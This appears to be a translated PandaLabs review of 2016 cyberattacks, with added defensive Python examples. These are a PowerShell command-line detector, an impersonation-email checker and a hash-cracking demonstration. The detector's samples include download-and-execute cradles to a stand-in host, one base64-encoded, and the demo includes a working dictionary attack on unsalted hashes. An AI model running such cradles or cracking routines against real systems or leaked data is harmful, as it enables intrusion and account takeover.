The year 2016 is drawing to a close, a year full of high-profile attacks that hit large companies and private users alike. Ransomware such as Petya, Android Trojans of the Gugi type, spyware such as Pegasus, PunkeyPOS and other large-scale attacks on payment terminals, and the recent DDoS attacks have caused enormous damage to large corporations and international communication networks.
The PandaLabs anti-virus laboratory of Panda Security presents a list of what we should expect in the coming year, 2017.
ANALYSIS
The year began with more than 20 million new malware samples detected and neutralized by PandaLabs in the first quarter (an average of 227,000 per day), slightly more than in the first quarter of 2015 (an average of 225,000 per day). Over 2016 as a whole, the number of new samples was somewhat lower than a year earlier, averaging up to 200,000 per day, although the attacks themselves became more effective.
Cyber criminals have become increasingly confident, and even though we are finishing the year with more optimistic indicators, we cannot relax our vigilance. Attackers concentrate their efforts on the most profitable attacks, refining their tactics so as to make quick, easy money more efficiently.

Attackers have turned their attention to organizations that process huge amounts of data, especially personal information (hospitals, pharmaceutical companies, hotels, etc.). Once they gain access to such an organization, they infect as many computers as possible with ransomware, after which they can demand whatever ransom they like from their victims or sell the data on the black market.
One thing that has not changed this year is the most widespread class of malware: Trojans, which together with ransomware have topped the "rating" for many years.
THE ATTACKS OF 2016
Ransomware
We know that ransomware is a serious business for cyber criminals, but its scale is extremely difficult to measure with any degree of certainty. We have seen these attacks evolve, with refinements such as direct chat between the victim and the attackers to "discuss" payment. Techniques have also become more sophisticated, and sometimes especially aggressive, as in the case of Petya, which instead of encrypting documents immediately attacks the computer's master boot record (MBR) and renders the machine unusable until the ransom is paid.

We are also seeing ever more abuse of PowerShell (which we predicted in the PandaLabs annual report for 2015), a scripting engine installed by default in Windows 10 that is often used in attacks to evade the security solutions installed on victims' computers: because it is a legitimate, signed system component, its activity blends in with normal administration.
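The evasion tricks that make PowerShell attractive to attackers (hidden windows, bypassed execution policy, base64-encoded commands, in-memory download cradles) are also what a detection engineer looks for in process-creation telemetry. The following is an added example, not code from the PandaLabs report: it scores constructed command lines against those indicators and, crucially, decodes any -EncodedCommand payload before matching, since the encoding exists precisely to defeat naive string matching. The sample events, the indicator weights and the alert threshold are assumptions for illustration; a real deployment would tune them against its own baseline.

```python
import base64
import re

# Constructed process-creation events (host, command line); not real telemetry.
# PowerShell's -EncodedCommand takes base64 of UTF-16LE text, so the first
# sample wraps a hypothetical download cradle exactly the way attackers do.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
ENCODED_PAYLOAD = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ("ws01", "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand " + ENCODED_PAYLOAD),
    ("ws02", r"powershell.exe -Command Get-ChildItem C:\Users"),
    ("ws03", "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""),
    ("ws04", r"powershell.exe -File C:\Scripts\backup.ps1"),
]

# PowerShell accepts any unambiguous prefix of a parameter name (-w, -ep, -enc ...),
# so the patterns match prefixes rather than full parameter names.
ENCODED_ARG = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (indicator name, weight, pattern); weights are illustrative assumptions.
INDICATORS = [
    ("hidden_window", 2, re.compile(r"-w\w*\s+hidden", re.I)),
    ("policy_bypass", 2, re.compile(r"-e[xp]\w*\s+(?:bypass|unrestricted)", re.I)),
    ("encoded_command", 2, ENCODED_ARG),
    ("download_cradle", 3, re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIWR\b", re.I)),
    ("invoke_expression", 1, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Score one command line. Indicators run over the raw line AND the decoded
    payload, so a cradle hidden behind -EncodedCommand is still caught."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    flags = [name for name, _weight, pattern in INDICATORS if pattern.search(haystack)]
    score = sum(weight for name, weight, _pattern in INDICATORS if name in flags)
    return {"score": score, "flags": flags, "decoded": decoded}


def triage(events, threshold=4):
    """Return (host, score, flags) for events at or above the threshold, highest score first."""
    hits = []
    for host, cmdline in events:
        result = analyze(cmdline)
        if result["score"] >= threshold:
            hits.append((host, result["score"], result["flags"]))
    return sorted(hits, key=lambda hit: -hit[1])


if __name__ == "__main__":
    for host, score, flags in triage(SAMPLE_EVENTS):
        print(f"{host}: score {score} ({', '.join(flags)})")
```

Run as a script it reports ws01 and ws03 and leaves the two administrative invocations alone. The threshold keeps a lone -NoProfile or -WindowStyle Hidden from alerting on its own; legitimate automation uses those too, so the signal comes from combining indicators, and above all from inspecting the decoded payload.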
In the second quarter we saw one of the strangest ransomware attacks, aimed at a company in Slovenia. Its head of security received a letter from Russia informing him that the network had been hacked and that ransomware would soon be running on all of the company's computers unless about 9,000 euros (in bitcoin) were paid within three days. To prove their access to the network, the attackers sent a list of all devices connected to the company's internal network.
Many victims, of course, chose to pay the ransom, although data recovery is never guaranteed. In the third quarter we observed greater specialization in ransomware operations.
The best example was set by the creators of the Petya and Mischa ransomware, who specialized in developing the malware and the associated payment platform while handing distribution over to third parties, a practice that has been called Ransomware as a Service (RaaS). Having done their part, they recruited distributors to infect victims. It works just like a legitimate business: the distributors' profit depends on the amount of money "earned", and the higher the sales, the higher the percentage they receive.
Malicious email
Attacks do not come only from malicious advertising or compromised websites. A huge number of attacks are still carried out by email, in the form of fake invoices or assorted notifications.
One such attack was carried out in at least two European countries, Poland and Spain, where the attackers posed as local electricity companies. The message carried no attachment, only billing information as text and a link to view the details.
The trick lay in the exorbitantly high amount on the bill, which made recipients indignant enough to click the link without thinking. The link led to a fake site closely resembling the real site of the recipient's power company, from which the "bill" could be downloaded. If the customer downloaded and opened the file, the computer was infected with ransomware.
CEO fraud phishing
This type of attack is rapidly gaining popularity. Posing as the company's president or chief financial officer, the attackers ask an employee to make a transfer. Beforehand they study how the company works from the inside, gathering information about their targets through social networks, which makes the scam more believable.
A prime example this year was the incident at Mattel, the famous maker of Barbie and Hot Wheels.

A senior manager received a message, apparently from the company's newly appointed chief executive, instructing him to transfer $3 million to a bank account in China. Once the transfer had gone through, he informed the executive that it was done. The executive was stunned: he had given no such instruction. The company urgently contacted the US authorities and the bank, but it was too late, because the money had already been transferred.
However, they were lucky: it was a bank holiday in China, which gave them enough time to alert the Chinese authorities. The account was frozen, and Mattel managed to get its money back.
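The message in the Mattel case carried the signals that a mail gateway can check mechanically: a trusted executive's display name on an address that is not the executive's, a lookalike or unrelated domain, a Reply-To that routes answers elsewhere, and urgent money language. The following is an added example, not code from the PandaLabs report or from Mattel: it runs those checks over two constructed messages. The executive roster, the trusted domain, the urgency word list and the risk thresholds are hypothetical assumptions for illustration.

```python
from email import message_from_string
from email.utils import parseaddr

# Hypothetical roster of people whose instructions move money, with their real addresses.
EXECUTIVES = {
    "Alice Example": "alice.example@example.com",
    "Bob Finance": "bob.finance@example.com",
}
TRUSTED_DOMAIN = "example.com"
URGENCY_WORDS = ("urgent", "wire", "transfer", "confidential", "immediately", "today")

# Constructed messages (not real mail). The first is a lookalike impersonation:
# the CEO's display name on a typo-squatted domain, with replies steered elsewhere.
SAMPLE_MESSAGES = [
    "From: Alice Example <alice.example@examp1e.com>\n"
    "Reply-To: Alice Example <ceo.office@mail.example.net>\n"
    "To: treasury@example.com\n"
    "Subject: Urgent wire transfer - confidential\n"
    "\n"
    "Please process a transfer of 3 million today to the account below. I am in a meeting, do not call.\n",
    # Legitimate internal mail from a listed executive at the real address.
    "From: Bob Finance <bob.finance@example.com>\n"
    "To: treasury@example.com\n"
    "Subject: Q3 close\n"
    "\n"
    "Numbers attached as discussed.\n",
]


def domain_of(address):
    return address.rpartition("@")[2].lower()


def edit_distance(a, b):
    """Plain Levenshtein distance; enough to catch examp1e.com posing as example.com."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, 1):
        current = [i]
        for j, char_b in enumerate(b, 1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (char_a != char_b)))
        previous = current
    return previous[-1]


def assess(raw_message):
    """Return the sender, the list of findings and a coarse risk level for one message."""
    msg = message_from_string(raw_message)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _reply_name, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_domain = domain_of(from_addr)
    findings = []

    # Display name belongs to a known executive but the address does not.
    known_addr = EXECUTIVES.get(from_name)
    if known_addr and known_addr.lower() != from_addr.lower():
        findings.append("display_name_spoof")
    # Sender domain is a near miss of ours (one or two edits away).
    if from_domain != TRUSTED_DOMAIN and edit_distance(from_domain, TRUSTED_DOMAIN) <= 2:
        findings.append("lookalike_domain")
    # Replies would go to a different domain than the apparent sender.
    if reply_addr and domain_of(reply_addr) != from_domain:
        findings.append("reply_to_mismatch")
    # Pressure and payment vocabulary in subject plus body.
    text = (msg.get("Subject", "") + " " + msg.get_payload()).lower()
    if sum(word in text for word in URGENCY_WORDS) >= 2:
        findings.append("urgent_money_language")

    risk = "high" if len(findings) >= 2 else ("medium" if findings else "low")
    return {"from": from_addr, "findings": findings, "risk": risk}


if __name__ == "__main__":
    for raw in SAMPLE_MESSAGES:
        print(assess(raw))
```

Header heuristics like these are a triage layer, not a control: the attacker in the Mattel case needed only one employee to act on the message. The check that actually stops the loss is procedural, namely confirming any new payment instruction through a second channel (a phone number already on file, not one in the email) before the transfer is released.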
Mobile devices
SNAP was one of the most talked-about vulnerabilities of the year, and LG G3 phones were affected by it. The problem was a bug in the Smart Notice application that allowed arbitrary JavaScript to run. BugSec discovered the vulnerability and reported it to LG, which promptly published a patch to fix it.
Gugi, an Android Trojan, managed to bypass the security barriers of Android 6 in order to steal banking credentials from applications installed on the phone. To do this, Gugi overlaid its own window on top of a legitimate application's window and asked for the user's banking details, which were sent straight to the cyber criminals without the user's knowledge.
In August, Apple released an urgent update of its mobile operating system, iOS 9.3.5. It fixed three zero-day vulnerabilities used by the Pegasus spyware, developed by the Israeli company NSO Group, whose products are similar to those of Hacking Team.
Internet of things
The automotive sector is at serious risk. Researchers at the University of Birmingham showed how they could defeat the keyless entry systems of cars sold by the Volkswagen Group over the past 20 years. Charlie Miller and Chris Valasek, who had previously hacked a Jeep Cherokee, went further and showed how they could manipulate the throttle, brakes and even the steering of a moving car.
Smart homes are also vulnerable to cyber attacks. Researcher Andrew Tierney demonstrated a thermostat ransomware attack he had developed. After taking control of the device (by inserting an SD card into it), he raised the temperature to 99 degrees Fahrenheit and demanded a PIN to unlock it. The thermostat connected to an IRC channel, using its MAC address as the identifier for each compromised device, and the user was asked for bitcoin in exchange for a PIN that changed every 30 seconds.
Cyber war
In the field of cyber warfare, 2016 showed that the United States had decided to go on the offensive, openly admitting to launching cyber attacks against ISIS. Robert Work, US Deputy Secretary of Defense, made this very clear in an interview with CNN.
In June, South Korean authorities disclosed an attack from the DPRK. The attack is thought to have begun about a year earlier, and its main target was 140,000 computers belonging to organizations and government agencies, as well as defense contractors; it was discovered only in February of this year. According to the police, more than 42,000 documents were stolen, 95% of them related to defense, including plans and specifications for the F-15 fighter.
In the midst of the US presidential election, one of the most talked-about incidents was the disclosure of the attack on the US Democratic National Committee, in which a huge amount of data was stolen and made public.

Continuing with the elections, the FBI warned that it had discovered two attacks on election-related websites; in at least one of them, a foreign attacker was able to deregister some voters.
In August, a group calling itself "The Shadow Brokers" announced that it had hacked the NSA and published some of the stolen "cyber-weapons", offering to sell the rest.
Cyber crime
In June, a criminal calling himself "TheDarkOverlord" put up for sale on the black market patient data from three US healthcare institutions. He had stolen records of more than 650,000 patients and asked about $700,000 for them. Shortly afterwards he offered the personal data of 9.3 million customers of a health insurer for 750 bitcoin (about $500,000).
In recent months Dropbox has also turned out to be a victim of cyber criminals: it emerged that the popular file-sharing service had been attacked back in 2012, and the result was the theft of data on 68 million users. But when it comes to sheer scale, the Yahoo incident stands out. It took place in 2014 but only became known recently: a total of 500 million accounts were compromised, the largest theft in history.

On August 2, one of the largest bitcoin thefts in history took place. Bitfinex, a cryptocurrency trading and exchange company, was attacked and the equivalent of about $60 million was stolen. The money belonged to customers who kept their bitcoins in this "bank".
There is still no evidence pointing to the perpetrators, and the company has not yet released details of what happened because law enforcement agencies are still investigating.
DDoS attacks
In September, the well-known security journalist Brian Krebs exposed vDOS, a "company" that sold DDoS attacks as a service. Shortly afterwards its operators were arrested; over two years they had carried out 150,000 attacks and earned $618,000.
Krebs's own website was then hit by a crushing DDoS attack that knocked it offline for several days. In the end Google, as part of its Project Shield, took on protecting the site, and it came back online.
In the last quarter of the year came a wave of large-scale attacks against the American DNS provider Dyn, which took down the websites of many large global corporations and online services such as Netflix, Twitter, Amazon and The New York Times.
Service was disrupted for almost 11 hours, affecting over a billion users.
POS terminals and bank cards
Wendy's, the popular fast-food chain, had more than 1,000 of its POS terminals infected with malware that stole its customers' card data.
PandaLabs also uncovered an attack using the well-known PunkeyPOS threat, which had infected over 200 restaurants in the United States. Our laboratory discovered a further similar attack this year, again against US restaurants: about 300 establishments whose POS terminals had been infected with the PosCardStealer malware.
Financial institutions
This year the central bank of Bangladesh fell victim to an attack in which transfers totaling $1 billion were ordered.
Fortunately, most of these transfers were blocked, although the criminals still got away with about $81 million.
Soon afterwards we saw two more similar cases: one against a bank in Vietnam and another against a bank in Ecuador.
Social networks
The security of 117 million LinkedIn users was put at risk when a list of email addresses and their corresponding password hashes was published.
32 million Twitter usernames and passwords were put up for sale for about $6,000. Twitter denies that the account information was obtained from its servers. In fact, the passwords were in plain text and most of them belonged to users in Russia, so they are suspected to have been obtained through phishing or Trojans.
MySpace was also attacked, even though hardly anyone uses it any more. The attack took place in 2013, but nothing was known about it until May of this year. Usernames, passwords and email addresses of approximately 360 million users were stolen.
An affected user may not have used MySpace for years, but if he has the habit of reusing the same password, now is the time to give it up and enable two-step verification.
Using two-step verification, creating strong passwords and never reusing the same password on different websites: these are basic information security tips that everyone should take to heart.
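The LinkedIn and MySpace leaks above illustrate why password reuse is dangerous even for dormant accounts: leaked hashes stored without a per-user salt are cracked in bulk, and the recovered passwords are then tried against every other site. The following is an added example, not code from the PandaLabs report: with a constructed leak it shows how one hash per guess cracks every account sharing a password when hashes are unsalted, how salting with a slow KDF multiplies the attacker's work by the number of accounts, and how a login service can refuse a password already recovered from a leak, whoever it leaked from. The sample accounts, the wordlist and the (deliberately low) iteration count are assumptions; production systems use far higher iteration counts.

```python
import hashlib
import hmac
import os


def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


# Constructed leak (not real data) in the shape the LinkedIn dump was reported
# to have: unsalted SHA-1, so two users with the same password share one hash.
LEAKED_SHA1 = {
    "user1@example.com": sha1_hex("linkedin2012"),
    "user2@example.com": sha1_hex("Summer2016!"),
    "user3@example.com": sha1_hex("linkedin2012"),
    "user4@example.com": sha1_hex("vR7#pQz!2mLw9eXs"),  # strong, not in any wordlist
}
WORDLIST = ["password", "123456", "qwerty", "linkedin", "linkedin2012", "Summer2016!"]


def crack_unsalted(leak, wordlist):
    """Dictionary attack on unsalted hashes: hash each guess once, then look every
    account up in the table. Returns (recovered passwords, number of hash operations)."""
    table = {sha1_hex(word): word for word in wordlist}
    recovered = {email: table[h] for email, h in leak.items() if h in table}
    return recovered, len(wordlist)


def store_pbkdf2(password, iterations=10_000):
    """Store a password as (random salt, PBKDF2-HMAC-SHA256 digest). The iteration
    count is kept low for the demo; real deployments use a much higher one."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "digest": digest, "iterations": iterations}


def verify_pbkdf2(password, record):
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["digest"])


def crack_salted(records, wordlist):
    """Against salted records no shared table exists: every (account, guess) pair
    costs one full KDF run. Returns (recovered passwords, number of KDF operations)."""
    recovered, operations = {}, 0
    for email, record in records.items():
        for word in wordlist:
            operations += 1
            if verify_pbkdf2(word, record):
                recovered[email] = word
                break
    return recovered, operations


def reused_passwords(logins, recovered):
    """Given (email, plaintext) pairs seen at login and the passwords recovered from a
    leak, return the accounts whose password is already burned, regardless of whose
    leaked account it came from."""
    burned = set(recovered.values())
    return sorted(email for email, password in logins if password in burned)


if __name__ == "__main__":
    recovered, ops = crack_unsalted(LEAKED_SHA1, WORDLIST)
    print(f"unsalted: {len(recovered)} of {len(LEAKED_SHA1)} accounts cracked with {ops} hashes")
    salted = {email: store_pbkdf2(pw) for email, pw in [("a@example.com", "linkedin2012"), ("b@example.com", "linkedin2012")]}
    recovered_salted, ops_salted = crack_salted(salted, WORDLIST)
    print(f"salted: {len(recovered_salted)} cracked with {ops_salted} KDF runs")
    print("reused:", reused_passwords([("staff@corp.example", "linkedin2012")], recovered))
```

The point the numbers make: the unsalted leak costs the attacker six hashes for the whole user base, while the salted store costs one KDF run per guess per account, so the work grows with the number of victims and each run is deliberately slow. Salting does nothing, however, for a user who reuses a password that has already been recovered from someone else's leak; that is what the reuse check and two-step verification are for.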

WHAT CYBER NIGHTMARES DOES 2017 HAVE IN STORE?
Ransomware
During 2016 ransomware was in the spotlight, and it most likely will be in 2017 too. In some ways this type of attack has displaced other, more traditional ways of stealing information: ransomware operators "earn" money far more easily, cutting out middlemen and unwanted risks.

Attacks on companies
Attacks on companies will become more numerous and more sophisticated.
Companies have already become a prime target for cyber criminals, because their information is more valuable than the data of private users.
Cyber criminals constantly look for weaknesses in corporate networks through which to penetrate them; once inside, they gain access to the resources holding the information they want. They can also launch large-scale ransomware attacks, infecting every available device, in order to demand astronomical sums for data recovery afterwards.
Internet of things
The Internet of Things (IoT) is the next information security nightmare. Any kind of network-connected device can be used as a way into corporate networks, and most of these devices lack a proper level of security.
As a rule they do not receive automatic security updates, they use weak passwords, and the same default passwords are often shared by thousands of devices; all of this together makes them very vulnerable to external attack.
DDoS
In the final months of 2016 we witnessed the most powerful DDoS attacks in history. They began in September with the attack on Brian Krebs after he reported on the activities of an Israeli company offering such attacks as a service.
Another major attack hit the French hosting company OVH (with traffic of up to 1 Tbps), and another hit the American company Dyn, leaving several Internet giants without service.
These attacks were carried out by botnets made up of thousands of infected IoT devices (IP cameras, routers, etc.). We can be sure that 2017 will bring more such attacks, which are typically used to damage a company's business reputation or to block its operations (cutting off Internet access, hampering online sales, etc.).
Mobile phones
Here the target is quite clear: Android devices will bear the brunt. It is no secret that Android has the largest market share and is installed on most devices; Apple holds a modest share with iOS, and the remaining systems have a small market share. Cyber criminals will find it easier to focus on a single operating system in order to maximize profits.

The solution depends not only on how promptly Android itself releases updates, but also on whether, when and how each device manufacturer chooses to ship them to its devices (if at all). Given the number of incidents that occur every month, this situation only increases the risk to users.
Cyber war
We are living through one of the most difficult stages in international relations in recent years: the threat of trade wars, espionage, confrontation between the leading powers. All this, of course, can have very serious consequences for cyber security.
Governments around the world seek access to ever more information (at a time when encryption is becoming ever more widespread), and so security services will be even more interested in obtaining information that can benefit their countries' industries.
Such a global trend may hinder the data-sharing initiatives through which large companies already exchange information to better protect themselves against cyber criminals by implementing standards and international rules of engagement.